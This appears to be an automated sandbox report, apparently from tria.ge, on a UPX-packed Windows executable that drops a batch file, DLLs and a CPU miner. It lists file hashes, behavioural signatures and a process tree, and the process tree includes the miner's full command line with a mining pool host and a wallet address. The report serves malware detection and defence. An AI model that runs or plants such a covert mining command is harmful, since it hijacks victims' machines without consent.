Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    295s
  • max time network
    301s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231215-ja
  • resource tags

    arch:x64arch:x86image:win10v2004-20231215-jalocale:ja-jpos:windows10-2004-x64systemwindows
  • submitted
    19/02/2024, 19:07

General

  • Target

    batexe.exe

  • Size

    9.4MB

  • MD5

    cdc9eacffc6d2bf43153815043064427

  • SHA1

    d05101f265f6ea87e18793ab0071f5c99edf363f

  • SHA256

    73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

  • SHA512

    fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6

  • SSDEEP

    196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score
7/10
upx

Malware Config

Signatures

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 5 IoCs
  • UPX packed file 1 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\batexe.exe
    "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:1744
    • C:\Users\Admin\AppData\Local\Temp\594B.tmp\b2e.exe
      "C:\Users\Admin\AppData\Local\Temp\594B.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\594B.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:1160
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\5BFB.tmp\batchfile.bat" "
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1640
        • C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
          cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          PID:3252

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\594B.tmp\b2e.exe

    Filesize

    587KB

    MD5

    fea1c01b23aa64a9ec039112ed7ed8bf

    SHA1

    2e4d9e66d1bf77e8cc98f8448a95583d937e1479

    SHA256

    cec04776370255aad7163575583cdcc2ad44bf493a013bf72779b000e4d12f4a

    SHA512

    4b2af6494bc407c92533ee11ec9fe15a03ff9deb7cf4bd8d73c522f9291ac45a4fc743d4fe370b6fcd032303384ff80f9789bc98117ef7567b64f926574bf0bb

  • C:\Users\Admin\AppData\Local\Temp\594B.tmp\b2e.exe

    Filesize

    311KB

    MD5

    c25f078d854b6eecafea08422d400be9

    SHA1

    d1fd6dde1ce96d9d271d3ded78e08a05c079460b

    SHA256

    5eb351b2b0126a67614e4a649255ea3fcebb8b8f29966e4ec41b91b28f5e8fa8

    SHA512

    c32a82e23b57c2270078fd1e6819c723c1f270e61e3eae738178898d0d5c5023252b7638ee0753e311fbd955a7e5967a8087917f56e4b4d6728580e462ab35f0

  • C:\Users\Admin\AppData\Local\Temp\594B.tmp\b2e.exe

    Filesize

    383KB

    MD5

    a0722090ec22ddd524394dc8a29b881f

    SHA1

    9dc74e600c470551f9502e0d2c8d1ab8cefb9d25

    SHA256

    79832d1aaefb4351b534f10e5731790f044bfd367e9a428b1e3b7bae437cc743

    SHA512

    6b0aafcd8e74c5b13adc2a37141730f18dcf67e148601d6b62e18030322834d86af8d618175069d5c24400bd4beaa73f04e9864df03ff70064bb3f7ff1193d89

  • C:\Users\Admin\AppData\Local\Temp\5BFB.tmp\batchfile.bat

    Filesize

    136B

    MD5

    8ea7ac72a10251ecfb42ef4a88bd330a

    SHA1

    c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

    SHA256

    65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

    SHA512

    a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

  • C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

    Filesize

    342KB

    MD5

    ef8bd5632886c483d385a61fbd471188

    SHA1

    492d35371807a1c2d45a106a6cdc054c03b68d82

    SHA256

    20721371bfe84a0829c53f675839877dca6b871e794b3cf38db6a2a522921355

    SHA512

    35d55320417832a1f7c7d878068dc39c39859967a3d305c0557ae6e35c77298e629f66f64c33ba5f5d10dad6311dcc6225c427d31f3a6a72c2e07a2afe82c7aa

  • C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

    Filesize

    333KB

    MD5

    325eddc9f624b8f5b43f95c3fdf1e50c

    SHA1

    b1253f1ac79f179bcae6d6f2dd865005b5f263a9

    SHA256

    46abf0be4bd961acb71f309ea81a1ecf5529175da2dd04492db3f1f44dda90e8

    SHA512

    e8aca9915ef2b842b46a4fa7487ae564b454320002c52e60c1a069f7041ea032cb9a0eb833b64a43b6dafd463d94013f8d3acca4fb8d622e3a5ebdc62c6f734a

  • C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

    Filesize

    320KB

    MD5

    9abc2d6fe180a37b542f3bf99c5d8a02

    SHA1

    5e790ae05ec1b186913b623aced47d297624505e

    SHA256

    eb1c9a5381930635bc73148bf8e4110f8d63016c12c2e0fae83250f9c448a355

    SHA512

    14edf6aecd8d06274489862a2c9c3f44e88cf151de58fe80499747a5f702635496a29e290f3e6f09241861024c12a570b20e44367e19326824ed20edb64c98b6

  • C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

    Filesize

    455KB

    MD5

    70da085c27d57f71eb905742c625bac0

    SHA1

    c752c4959659f55f3f97368472af78cb32c3811b

    SHA256

    afed1d669d4bc37657f90f6c5cb95942de9817f0e14aa480fce13baa63605229

    SHA512

    6d0c5cf24488df40331e14ebba10f63f7d43d9399ee427d02cb3d400abaf8ee7c3538a34ce8b6769aaf90c013d6237f579901b20d7bb8c7d79618bff49653a14

  • C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

    Filesize

    29KB

    MD5

    16346bed1eda23c10aedf446308160fd

    SHA1

    8f3c2504ecea24d623de72be6a1f3f88ab81c39b

    SHA256

    4b3adf842053b2176220b6d8c772e10f2069cb8c332b26b0d80728d607007b83

    SHA512

    4d0764f8d27dcea55db6d5abffe679af5676c1e636f0bcc044a2898e8dbd4c2de5203b37b84a5825a7c43aa888d60921ec9000ca070f08b83759bd4424f1d07d

  • C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

    Filesize

    342KB

    MD5

    5e927cbf1c58ff2a9e6387b5449a594b

    SHA1

    41878ce55789632331c2665529a0a3349c8ed70d

    SHA256

    ee31afeba5011c397cfde20da4417b04ac4893164ca820d94f49e3016876579a

    SHA512

    fb6458232802bd33f8532813ed08065c73cd66ec27d7ca61f51d2f595a854d1120e35ae37d34ee64bf8d936ddbb3ca82d80dfff7fe4aa50a820790019b0e7562

  • C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

    Filesize

    32KB

    MD5

    b5ee2ecfeb4202d3e8b80c60fe8c98f4

    SHA1

    f4c7678c3241776d53736f224f09d2cd49ec0876

    SHA256

    c8095b7b9c67c5c3106a7469febc09bba50b3a384bfb98bf0fba0a4a22c36844

    SHA512

    17190c52d497237abec71f569306b8f9cc36104ef89f002ab366702892cfae8311a7f4ac5ecb410b173932d3c5f3ebd0b16158d26a0e90c9dc029b3e805db543

  • C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

    Filesize

    434KB

    MD5

    d9e4de1938ccdb97fb8c64bdc6732248

    SHA1

    50906c7ac7f0b4b55d5aa79aadc1c8e62f872094

    SHA256

    bd55e9678c616c987e26a3e026f76def805da213378697d8497ed7c6a94a619f

    SHA512

    18274322fe30feaac75cb73a620691b866a0ece502f81728f018e99c4d7f15e8b600834ad2519b575af132c597b58e14e3bd7e4a6c01d1df431cd0fe179b5491

  • C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

    Filesize

    149KB

    MD5

    31325ee097b2686dd3f7ed3c46dca632

    SHA1

    b0f57a72c2b5d73f2a3b64937f3c442d4c1892b0

    SHA256

    a8695fed44df7301297f77490b02ecb540f18663e0023f9bbe956e9ab1adada8

    SHA512

    0b6b4ebd9c5437aee23455b1aa41814b413a9f8fb6257ddb7984254aa0c2fe6b50bc8829eed15295bce4b0c7476732a8f2f660cb72587f639c29bc63b8cc64f7

  • C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

    Filesize

    368KB

    MD5

    ef47272543eba722b4d8e902431e4208

    SHA1

    df59be565b9051a17c7c21bf9e50dc5c1dc29078

    SHA256

    8f46f6941285af191a1fe2c89f15c65cdfe3986772245ffa37ed8dabe9c6c8c6

    SHA512

    4c00a1db992be74e6c50793a8cd9a6e7598190f761837553fa7e97403c15ffc232fa3332a93dab9642affaeda472e4ae17cae3ce463041f1a251a11829944e29

  • C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

    Filesize

    367KB

    MD5

    41217be4144b5551c1b2df7e883b01fa

    SHA1

    a8fa0c068233d97656d878d29303b39af2721fbd

    SHA256

    d16b777fa8214b8fa07e483ff5f1fdd808fa7779d0b3904642a36d8dcf4fb688

    SHA512

    e14e8f8e9d2be69ce414c1a9ae01e6257f0b61a7ff07a38c34f541c024b651df1f147cfeb5e14162f8f1a6002b2c0f56f9e868084223faa4e486237ba4c8204a

  • memory/1160-53-0x0000000000400000-0x0000000000405000-memory.dmp

    Filesize

    20KB

  • memory/1160-9-0x0000000000400000-0x0000000000405000-memory.dmp

    Filesize

    20KB

  • memory/1744-8-0x0000000000400000-0x000000000393A000-memory.dmp

    Filesize

    53.2MB

  • memory/3252-45-0x0000000072210000-0x00000000722A8000-memory.dmp

    Filesize

    608KB

  • memory/3252-44-0x0000000070800000-0x00000000708BC000-memory.dmp

    Filesize

    752KB

  • memory/3252-43-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/3252-47-0x0000000000E10000-0x00000000026C5000-memory.dmp

    Filesize

    24.7MB

  • memory/3252-48-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/3252-46-0x0000000061440000-0x000000006156B000-memory.dmp

    Filesize

    1.2MB

  • memory/3252-59-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/3252-64-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/3252-74-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/3252-89-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/3252-94-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/3252-99-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB